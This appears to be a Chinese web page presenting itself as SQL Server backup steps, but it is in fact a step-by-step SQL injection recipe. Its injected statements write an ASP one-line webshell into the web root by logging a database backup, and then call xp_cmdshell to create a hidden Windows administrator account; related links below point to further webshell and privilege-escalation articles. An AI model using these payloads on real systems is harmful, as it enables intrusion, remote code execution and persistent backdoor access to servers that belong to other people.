sqlserver 手工实现差异备份的步骤

手工实现差异备份的步骤

字符型:

1、恢复当前库
;alter database 当前库 set RECOVERY FULL--

2、建表cmd
;create table cmd (a image)--

3、备份当前库到D:\cmd1
;backup log 当前库 to disk = 'D:\cmd1' with init--

4、插入一句话代码到创建的表cmd
;insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')--

5、备份一句话代码到站点根目录
;backup log 当前库 to disk = 'D:\www_web\oct.asp'--

6、完成
;drop table 创建的表--

数字型

1、恢复当前库
';alter database 当前库 set RECOVERY FULL--

2、创建表cmd
';create table cmd (a image)--

3、备份当前库到D:\cmd1
';backup log 当前库 to disk = 'D:\cmd1' with init--

4、插入一句话代码到创建的表cmd
';insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')--

5、备份一句话代码到站点根目录
';backup log 当前库 to disk = 'D:\www_web\oct.asp'--

6、完成
';drop table 创建的表--

sa权限创建管理员用户

1、判断是否有注入;and 1=1 ;and 1=2 
;and user_name()='dbo' 判断当前系统的连接用户是不是sa

2、添加系统的管理员
;exec master.dbo.xp_cmdshell 'net user wk wk90/add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators wk /add';--

逍遥复仇:有工具我是一定不会手工的,麻烦。

(0)

相关推荐

  • sqlserver 手工实现差异备份的步骤

    手工实现差异备份的步骤 字符型: 1.恢复当前库;alter database 当前库 set RECOVERY FULL-- 2.建表cmd;create table cmd (a image)-- 3.备份当前库到D:\cmd1;backup log 当前库 to disk = 'D:\cmd1' with init-- 4.插入一句话代码到创建的表cmd;insert into cmd (a) values ('<%%25**ecute(request("a"))%%25&

  • 复习一下sql server的差异备份

    MSSQL差异备份,就是和前一次备份作对比,把不一样的内容备份下来,这样,只要前一次备份后,插入新的内容,差异备份就可以把刚插入的内容备份出来,而这个备份文件将大大减少,得到webShell的成功也提高了不少! 差异备份的流程大概这样: 1.完整备份一次(保存位置当然可以改) backup database 库名 to disk = 'c:\ddd.bak';-- 2.创建表并插曲入数据 create table [dbo].[dtest] ([cmd] [image]); insert int

  • SQL Server还原完整备份和差异备份的操作过程

    SQL Server还原完整备份和差异备份的操作过程

    1.首先右键数据库,点击还原数据库: 然后会打开还原数据库窗口,如图所示: 首先 "源" 选择设备,并且选择到完整备份的数据库备份文件 然后在 "目标" 数据库可直接填写还原以后的数据库名称 接着点击左侧文件: 建议勾选选项"将所有文件重新定位到文件夹",其实就是还原以后的数据库保存位置,当然不勾也一样能还原. 然后继续点击左侧选项: 覆盖现有数据库可勾可不勾,如果是还原到已存在的数据库,建议勾选. 重点: 第一个红框中的恢复状态选择: 如果只需

  • Python 实现文件的全备份和差异备份详解

    Python实现文件的全备份和差异备份 之前有写利用md5方式来做差异备份,但是这种md5方式来写存在以下问题: md5sum获取有些软连接的MD5值存在问题 不支持对空目录进行备份,因为md5sum无法获取空目录的md5值 权限的修改md5sum无法判断 解决方案: 利用文件的mtime ctime mtime(Modified time)是在写入文件时随文件内容的更改而更改的 ctime(Create time)是在写入文件.更改所有者.权限或链接设置时随Inode的内容更改而更改的 废话不

  • Python实现网站文件的全备份和差异备份

    之前有写利用md5方式来做差异备份,但是这种md5方式来写存在以下问题: •md5sum获取有些软连接的MD5值存在问题 •不支持对空目录进行备份,因为md5sum无法获取空目录的md5值 •权限的修改md5sum无法判断 解决方案: 利用文件的mtime ctime mtime(Modified time)是在写入文件时随文件内容的更改而更改的 ctime(Create time)是在写入文件.更改所有者.权限或链接设置时随Inode的内容更改而更改的 废话不多说直接上代码: #!/usr/b

  • 提权思路之MSSQL差异备份取系统权限

    MSSQL差异备份获取webshell 几乎人人皆知,那么我们可以利用差异备份出来的文件 当作恶意代码 让系统执行了之后自动提升权限 或者添加管理员吗? 答案当然可以了,kj021320测试了N次之后跟你说! 那么我们得考虑文件摆放的位置~什么地方系统会运行呢?这个其实算是废话吧! 大家不用想都知道 通用地方 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 呵呵位置有了! 那么我们备份什么文件让系统能执行的呢? 这个是第一个关键点~! EXE J

  • MSSQL差异备份取系统权限的相关软件下载

    昨天在网上找资料的时间无意进了一个站,糊里糊涂就进去了,想提权提不起来,后来加上服务商的Q号想社工一下,射了半天得知服务器的安全是绿盟的人给做的 安全,后来就问猪猪有什么提权的方法没,他刚好做了这个动画就给发来过来,在网上查了一下找到了文章,一起拷贝过来.最近忙着学习很少关注这方面的东西, 落后了,落后了...... 下面是是在网上找到的资料和动画. TEAM里的内部资料放久了,现在不放出来,迟早会有人发掘出来的!既然如此就拿出来大家分享吧! MSSQL差异备份获取webshell 几乎人人皆知

  • SVN服务备份操作步骤分享

    SVN服务备份操作步骤分享

    SVN服务备份操作步骤 1.准备源服务器和目标服务器 源服务器:192.168.1.250 目标服务器:192.168.1.251 root/rootroot 2.对目标服务器(251)装SVN服务器, 脚本如下: yum install subversion 3.创建一个新的仓库 (svnadmin create 路径),脚本如下: svnadmin create ~/svn-storage-bak 4.进入svn-storage-bak这个仓库的根目录中,脚本如下: cd ~/svn-sto

  • linux手工配置ip地址详细步骤

    linux手工配置ip地址详细步骤

    目录 1.先进入网卡配置目录 2.编辑ifcfg-ens33网卡的配置文件 3.刷新网络服务 4.测试ping百度能否上网 1.先进入网卡配置目录 2.编辑ifcfg-ens33网卡的配置文件       vim ifcfg-ens33如下: 修改之后如下: 退出保存,使用ip add查看自己的ip地址,ip route查看网关,然后再继续编辑ifcfg-ens33网卡的配置文件   退出并且保存(wq) 解析如下:  BOOTPROTO=none   #设置网卡静态配置ip地址  none 静

  • SqlServer高版本数据备份还原到低版本

    SqlServer高版本数据备份还原到低版本

    最近遇见一个问题: 想要将Sqlserver高版本备份的数据还原到低版本SqlServer上去,但是这在SqlServer中是没法直接还原数据库的,所以经过一系列的请教总结出来一下可用方法. 首先.你得在电脑上装有你将要操作的高版本以及低版本的SqlServer或者你能够连上SqlServer高版本所在的数据库(便于后面拷贝数据), 第二步.打开高版本数据库中你需要备份的数据库,将你备份的数据库相关的登录名或者用户删除.右键数据库->任务->生成脚本.在生成脚本的"选择对象"

随机推荐